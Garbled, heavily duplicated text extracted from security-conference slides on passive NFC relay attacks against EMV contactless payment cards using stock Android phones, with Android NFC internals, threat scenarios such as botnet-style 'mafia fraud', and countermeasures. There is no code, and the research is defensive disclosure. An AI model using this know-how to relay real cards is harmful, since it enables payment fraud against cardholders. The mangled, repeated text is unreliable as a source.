Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VII)
Ok So is it secure right RightIf it were so secure you would not be staring at us uml
NFC security threatsEavesdropping
Secure communication as solution
Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)
RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)
We focus on passive relay attacks
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
